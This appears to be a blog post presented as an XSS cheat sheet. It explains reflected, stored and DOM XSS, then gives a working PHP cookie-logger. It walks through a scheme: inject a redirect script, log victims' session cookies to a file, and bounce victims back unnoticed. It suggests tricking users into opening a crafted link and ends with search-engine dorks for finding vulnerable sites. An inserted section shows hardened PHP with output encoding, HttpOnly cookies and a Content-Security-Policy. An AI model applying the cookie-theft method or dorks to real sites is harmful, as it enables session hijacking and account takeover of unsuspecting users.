Monday, April 21, 2014

XSS cheat sheet by Gorvam saddar

XSS cheat sheet



Before we start, what is XSS? Let's begin with the basics. First, what is a cookie? (Not the edible kind.)
COOKIE:
A cookie is a small piece of data that the web browser stores for a site; sites use it to hold the session that keeps you logged in. Without a cookie, you cannot "stay logged in" on websites.
CROSS SITE SCRIPTING:
Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a web page.

SOME POINTS ON XSS:
@ - XSS attacks almost always focus on sites that use cookies to keep users logged in.
@ - XSS is used to harm the website (for example, defacing it).
Traditional types: type 0, type 1, type 2

Type 0 = DOM-based:

DOM-based XSS is an attack in which the payload is executed as a result of modifying the DOM "environment" in the victim's browser that the original client-side script uses, so that the client-side code runs in an "unexpected" manner. That is, the page itself (the HTTP response) does not change, but the client-side code contained in the page executes differently because of the malicious modifications that have occurred in the DOM environment.

Type 1 = Non-persistent (reflected):

The injected code is not permanent; it lives only for a short time, while the user is on the page or holds the URL that carries the malicious code.

Type 2 = Persistent (stored):

The injected code is permanent: it is saved on the site and its output can be seen by any user of the site.

Now the question is how to check whether a site is XSS vulnerable or not.
There are two methods to check this:

1. POST:

http://www.target.com/search.php (we put the malicious code into the site's search form)

2. GET:

http://www.target.com/search=
We put the script directly into the URL in the browser.

What else can we do?
--> Insert an image:
<img src="url of the image">
--> Insert a message:
this is hacked
--> Redirect to your page:

But the main aim of XSS is to steal cookies, so here is cookie stealing.
COOKIE STEALING TUTORIAL:

<?php
// Cookie logger described in the post: appends the query string (the stolen
// cookie) plus request metadata to log.txt.

// Best-effort client address: proxy headers first, then REMOTE_ADDR.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];            // whatever the injected script appended to the URL
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    // These headers are optional; use empty strings when absent to avoid notices.
    $rem_port    = $_SERVER['REMOTE_PORT'] ?? '';
    $user_agent  = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $rqst_method = $_SERVER['REQUEST_METHOD'] ?? '';
    $rem_host    = $_SERVER['REMOTE_HOST'] ?? '';
    $referer     = $_SERVER['HTTP_REFERER'] ?? '';
    $date = date("l dS of F Y h:i:s A");
    $log = fopen($ipLog, "a+");

    fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie\n\n");
    fclose($log);
}

logData();

?>

Now, how is this code used?
This is a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you need an account on a server, where you create two files: log.txt and giveyourname.php. You can leave log.txt empty; this is the file the cookie stealer writes to. Paste the PHP code shown above into the cookie stealer script (giveyourname.php).
That script records the cookies of every user that reaches it.
The injected script is then placed on the XSS-vulnerable page via the GET or POST method. What does it do?
The injected script redirects the viewer to your recorder script, which writes their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't notice that anything happened.


If the injection works, the cookies arrive at your site automatically; otherwise you have some extra work: grab the link you get after inserting the script and get someone to open that link. Once that is done, everything is in place.

## All you need to do now is go to your website and check the log file
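The defender's counterpart to the reflected search page and the cookie theft described above, as an added example that is not part of the original post: a hardened search.php that encodes the reflected parameter, marks the session cookie HttpOnly so document.cookie cannot read it, and sends a Content-Security-Policy. It assumes PHP 7.3 or later for the array form of session_set_cookie_params().

```php
<?php
// Added example (not from the original post): hardened search.php.

// 1. Session cookie flags. HttpOnly keeps the cookie out of document.cookie,
//    so a logger like the one in the post never receives it even if a script
//    does run; Secure restricts it to HTTPS; SameSite limits cross-site sends.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Strict',
]);
session_start();

// 2. Content-Security-Policy: inline and third-party scripts are refused, and
//    img-src 'self' blocks image-beacon exfiltration if encoding is missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');

// 3. Encode untrusted input for HTML body and attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$q = $_GET['search'] ?? '';   // the reflected parameter the post targets

// Vulnerable form (type 1, reflected):  echo "You searched for: $q";
// Hardened form below: the payload is rendered as text, not as markup.
?>
<!DOCTYPE html>
<html>
<body>
<p>You searched for: <?= h($q) ?></p>
<form method="get" action="search.php">
  <input name="search" value="<?= h($q) ?>">
  <button type="submit">Search</button>
</form>
</body>
</html>
```

With these headers in place, a request such as search.php?search=&lt;script&gt; is echoed back as literal text, and any script that does execute elsewhere on the site still cannot read the session cookie.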

YOU CAN TRY TO LOOK HERE:
SEARCH BOX
SHOUT BOX
BLOGS
COMMENT BOX
LOGIN BOX
FEEDBACK FORMS

There are still many XSS-vulnerable sites; the thing is, you have to spend a lot of time searching the internet for them.
Here are a few dorks for you:
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
/preaspjobboard//Employee/emp_login.asp?msg1=
pages/match_report.php?mid= pages/match_report.php?mid=
inurl:?msg=
